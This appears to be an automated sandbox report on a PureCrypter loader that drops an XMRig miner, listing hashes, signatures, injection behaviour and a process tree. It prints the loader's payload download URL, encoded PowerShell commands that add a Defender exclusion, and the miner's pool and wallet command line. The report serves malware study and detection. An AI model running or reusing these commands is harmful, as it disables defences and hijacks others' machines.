purecrypter | 6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45

Analysis

max time kernel
150s
max time network
150s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
31/01/2023, 16:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
Size

171KB
MD5

97570f2445b1ecd08dd0619717c2a3eb
SHA1

321697b118fed0d76d6ad87ddbcedce34e00b641
SHA256

6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45
SHA512

a06b7858a1c60f7d61c5629a84a00fba8f8a4d07ac780f597d0303c921b5c5df1371bf476f4a3456460ffb76b7c13516e6eba7775c638d060116d319ed8b962d
SSDEEP

1536:oyj17c9URWzKr7PhuuUpV7+5JTiy95UuUCQahsf5mZIWiwwr7QXsouW2ASDDA6rQ:9j17pWaxa7Dy956S2j4xnsvXtPdSae1

Score

10^/10

purecrypter xmrig downloader loader miner

Malware Config

Extracted

Family

purecrypter

http://163.123.142.210/Dzsifrcw.dll

Signatures

Detect PureCrypter injector 1 IoCs

loader

resource	yara_rule
behavioral1/memory/3824-117-0x000001BDB4E90000-0x000001BDB517A000-memory.dmp	family_purecrypter

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/memory/1340-232-0x0000000140344454-mapping.dmp	xmrig
behavioral1/memory/1340-231-0x0000000140000000-0x00000001407CA000-memory.dmp	xmrig
behavioral1/memory/1340-233-0x0000000140000000-0x00000001407CA000-memory.dmp	xmrig
behavioral1/memory/1340-234-0x0000000140000000-0x00000001407CA000-memory.dmp	xmrig
behavioral1/memory/1340-236-0x0000000140000000-0x00000001407CA000-memory.dmp	xmrig
behavioral1/memory/1340-238-0x0000000140000000-0x00000001407CA000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1604 set thread context of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
1608	powershell.exe
1608	powershell.exe
1608	powershell.exe
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe
1336	powershell.exe
1336	powershell.exe
1336	powershell.exe
2836	powershell.exe
2836	powershell.exe
2836	powershell.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
620	Process not Found

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeDebugPrivilege	3824	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	3824	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
Token: SeIncreaseQuotaPrivilege	1316	powershell.exe
Token: SeSecurityPrivilege	1316	powershell.exe
Token: SeTakeOwnershipPrivilege	1316	powershell.exe
Token: SeLoadDriverPrivilege	1316	powershell.exe
Token: SeSystemProfilePrivilege	1316	powershell.exe
Token: SeSystemtimePrivilege	1316	powershell.exe
Token: SeProfSingleProcessPrivilege	1316	powershell.exe
Token: SeIncBasePriorityPrivilege	1316	powershell.exe
Token: SeCreatePagefilePrivilege	1316	powershell.exe
Token: SeBackupPrivilege	1316	powershell.exe
Token: SeRestorePrivilege	1316	powershell.exe
Token: SeShutdownPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeSystemEnvironmentPrivilege	1316	powershell.exe
Token: SeRemoteShutdownPrivilege	1316	powershell.exe
Token: SeUndockPrivilege	1316	powershell.exe
Token: SeManageVolumePrivilege	1316	powershell.exe
Token: 33	1316	powershell.exe
Token: 34	1316	powershell.exe
Token: 35	1316	powershell.exe
Token: 36	1316	powershell.exe
Token: SeDebugPrivilege	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
Token: SeIncreaseQuotaPrivilege	2836	powershell.exe
Token: SeSecurityPrivilege	2836	powershell.exe
Token: SeTakeOwnershipPrivilege	2836	powershell.exe
Token: SeLoadDriverPrivilege	2836	powershell.exe
Token: SeSystemProfilePrivilege	2836	powershell.exe
Token: SeSystemtimePrivilege	2836	powershell.exe
Token: SeProfSingleProcessPrivilege	2836	powershell.exe
Token: SeIncBasePriorityPrivilege	2836	powershell.exe
Token: SeCreatePagefilePrivilege	2836	powershell.exe
Token: SeBackupPrivilege	2836	powershell.exe
Token: SeRestorePrivilege	2836	powershell.exe
Token: SeShutdownPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeSystemEnvironmentPrivilege	2836	powershell.exe
Token: SeRemoteShutdownPrivilege	2836	powershell.exe
Token: SeUndockPrivilege	2836	powershell.exe
Token: SeManageVolumePrivilege	2836	powershell.exe
Token: 33	2836	powershell.exe
Token: 34	2836	powershell.exe
Token: 35	2836	powershell.exe
Token: 36	2836	powershell.exe
Token: SeLockMemoryPrivilege	1340	AddInProcess.exe
Token: SeLockMemoryPrivilege	1340	AddInProcess.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1340	AddInProcess.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 3824 wrote to memory of 1608	3824	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	67
PID 3824 wrote to memory of 1608	3824	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	67
PID 3824 wrote to memory of 3420	3824	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	69
PID 3824 wrote to memory of 3420	3824	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	69
PID 3420 wrote to memory of 1316	3420	cmd.exe	71
PID 3420 wrote to memory of 1316	3420	cmd.exe	71
PID 1604 wrote to memory of 1336	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	74
PID 1604 wrote to memory of 1336	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	74
PID 1604 wrote to memory of 4932	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	76
PID 1604 wrote to memory of 4932	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	76
PID 4932 wrote to memory of 2836	4932	cmd.exe	78
PID 4932 wrote to memory of 2836	4932	cmd.exe	78
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80
PID 1604 wrote to memory of 1340	1604	6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe	80

C:\Users\Admin\AppData\Local\Temp\6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
"C:\Users\Admin\AppData\Local\Temp\6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3420
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1316

C:\Users\Admin\AppData\Roaming\6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
C:\Users\Admin\AppData\Roaming\6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2836
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 45.142.122.11:8080 -u 46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ.Worker_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1340

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
42d4b1d78e6e092af15c7aef34e5cf45

SHA1
6cf9d0e674430680f67260194d3185667a2bb77b

SHA256
c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

SHA512
d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
04f82334e922fc8dee2457524194b098

SHA1
0bcf2ea60e209566dbc19037cf4046b4b00894e4

SHA256
5366e6a86fb9b33e058c6da7a9279b79607f54fa7a414740d17058e0be0caba3

SHA512
06befdc85e855364022aa9d46ed7b536d9d4a439a2e37a99e5231e21b252b94d862d71b988f947a348aeedbcf9032d05aa80c4052889fc688596750d9f45559b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b270e4d21ef697a26e02105f79970f73

SHA1
0d4d61bf66ec7545afc2552f591a279e33850247

SHA256
ec70084fa99e6111a7ca775f7b23b36ccbe950c20300616bcb4d290534d3ee9a

SHA512
9c22cc1e5e4b36a98962d9d2d7949a90b266005d59fa1d2deac96f006bd4c723745d85abefd626a070d8e53900c3e7450701d8bf83b1bf89ae58811d356f81f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bb22976dfb78c53ed63fc63cc007d6b2

SHA1
a154272b62375b7ae87f180bc1b230c74e16e593

SHA256
80f7b59ba901d59124a76ffe8dad93445ad5ae5e0bdafba349d3650ab3d87aec

SHA512
860c0086c708ff1e7642ca6d5a4c886153800197991588ab585a6090d72befc9f4d95be7dd10b12b9326281d0bb9900315c41a3488fc31f3f69a2b56c77935d8

Download Submit
C:\Users\Admin\AppData\Roaming\6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe

Filesize
171KB

MD5
97570f2445b1ecd08dd0619717c2a3eb

SHA1
321697b118fed0d76d6ad87ddbcedce34e00b641

SHA256
6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45

SHA512
a06b7858a1c60f7d61c5629a84a00fba8f8a4d07ac780f597d0303c921b5c5df1371bf476f4a3456460ffb76b7c13516e6eba7775c638d060116d319ed8b962d

Download Submit
C:\Users\Admin\AppData\Roaming\6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45.exe

Filesize
171KB

MD5
97570f2445b1ecd08dd0619717c2a3eb

SHA1
321697b118fed0d76d6ad87ddbcedce34e00b641

SHA256
6ad71236a8807687b670fe635f799ad2f811d88e9f7d8075d3df4cafeb1cbd45

SHA512
a06b7858a1c60f7d61c5629a84a00fba8f8a4d07ac780f597d0303c921b5c5df1371bf476f4a3456460ffb76b7c13516e6eba7775c638d060116d319ed8b962d

Download Submit
memory/1340-235-0x000001F793160000-0x000001F793180000-memory.dmp

Filesize
128KB

Download
memory/1340-240-0x000001F794B60000-0x000001F794B80000-memory.dmp

Filesize
128KB

Download
memory/1340-239-0x000001F794B60000-0x000001F794B80000-memory.dmp

Filesize
128KB

Download
memory/1340-238-0x0000000140000000-0x00000001407CA000-memory.dmp

Filesize
7.8MB

Download
memory/1340-237-0x000001F794B20000-0x000001F794B60000-memory.dmp

Filesize
256KB

Download
memory/1340-236-0x0000000140000000-0x00000001407CA000-memory.dmp

Filesize
7.8MB

Download
memory/1340-231-0x0000000140000000-0x00000001407CA000-memory.dmp

Filesize
7.8MB

Download
memory/1340-234-0x0000000140000000-0x00000001407CA000-memory.dmp

Filesize
7.8MB

Download
memory/1340-233-0x0000000140000000-0x00000001407CA000-memory.dmp

Filesize
7.8MB

Download
memory/1604-229-0x0000028EEDBAA000-0x0000028EEDBAF000-memory.dmp

Filesize
20KB

Download
memory/1604-230-0x0000028EEE880000-0x0000028EEE896000-memory.dmp

Filesize
88KB

Download
memory/1608-126-0x0000028D79D90000-0x0000028D79E06000-memory.dmp

Filesize
472KB

Download
memory/3824-176-0x000001BDB5A60000-0x000001BDB5AB4000-memory.dmp

Filesize
336KB

Download
memory/3824-136-0x000001BDB5310000-0x000001BDB53DE000-memory.dmp

Filesize
824KB

Download
memory/3824-118-0x000001BD9C3F0000-0x000001BD9C412000-memory.dmp

Filesize
136KB

Download
memory/3824-179-0x000001BDB4D8A000-0x000001BDB4D8F000-memory.dmp

Filesize
20KB

Download
memory/3824-116-0x000001BD9A830000-0x000001BD9A85E000-memory.dmp

Filesize
184KB

Download
memory/3824-117-0x000001BDB4E90000-0x000001BDB517A000-memory.dmp

Filesize
2.9MB

Download
memory/3824-175-0x000001BDB5A10000-0x000001BDB5A5C000-memory.dmp

Filesize
304KB

Download
memory/3824-173-0x000001BDB4D8A000-0x000001BDB4D8F000-memory.dmp

Filesize
20KB

Download
memory/3824-153-0x000001BDB59B0000-0x000001BDB5A06000-memory.dmp

Filesize
344KB

Download
memory/3824-151-0x000001BDB5910000-0x000001BDB59AE000-memory.dmp

Filesize
632KB

Download
memory/3824-145-0x000001BDB5710000-0x000001BDB579C000-memory.dmp

Filesize
560KB

Download
memory/3824-143-0x000001BDB53E0000-0x000001BDB5471000-memory.dmp

Filesize
580KB

Download